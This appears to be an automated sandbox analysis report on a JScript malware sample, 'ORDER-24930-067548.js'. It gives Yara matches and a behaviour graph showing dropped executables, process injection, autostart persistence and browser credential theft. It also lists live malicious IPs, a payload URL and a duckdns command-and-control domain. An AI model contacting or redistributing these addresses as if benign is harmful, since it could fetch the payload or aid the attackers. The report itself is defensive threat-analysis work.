Source: Yara match File source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523152 Sample: ORDER-24930-067548.js Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 17 other signatures 2->65 8 wscript.exe 4 15 2->8         started        13 Service.exe 2->13         started        15 Service.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 55 192.210.215.11, 49704, 80 AS-COLOCROSSINGUS United States 8->55 51 C:\Users\user\AppData\Local\Temp\OLWJMU.js, Unicode 8->51 dropped 53 C:\Users\user\AppData\Local\...\cc[1].js, Unicode 8->53 dropped 77 System process connects to network (likely due to code injection or exploit) 8->77 79 Benign windows process drops PE files 8->79 81 JScript performs obfuscated calls to suspicious functions 8->81 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->83 19 wscript.exe 2 8->19         started        85 Antivirus detection for dropped file 13->85 87 Machine Learning detection for dropped file 13->87 89 Injects a PE file into a foreign processes 13->89 23 Service.exe 13->23         started        25 Service.exe 13->25         started        33 3 other processes 13->33 91 Creates multiple autostart registry keys 15->91 35 5 other processes 15->35 27 GeUT.exe 17->27         started        29 GeUT.exe 17->29         started        31 GeUT.exe 17->31         started        37 8 other processes 17->37 file5 signatures6 process7 file8 47 C:\Users\user\AppData\Local\TempbehaviorgrapheUT.exe, PE32 19->47 dropped 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->67 39 GeUT.exe 2 4 19->39         started        signatures9 process10 file11 49 C:\Users\user\AppData\Roaming\Service.exe, PE32 39->49 dropped 69 Antivirus detection for dropped file 39->69 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->71 73 Machine Learning detection for dropped file 39->73 75 2 other signatures 39->75 43 GeUT.exe 1 26 39->43         started        signatures12 process13 dnsIp14 57 194.37.97.150, 49705, 6980 AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT Romania 43->57 93 Tries to harvest and steal browser information (history, passwords, etc) 43->93 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.210.215.11
 unknown United States
36352 AS-COLOCROSSINGUS true
194.37.97.150
 unknown Romania
43913 AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.210.215.11/zoom/cc.js true
    		unknown
    as525795.duckdns.org true unknown
    194.37.97.150 true unknown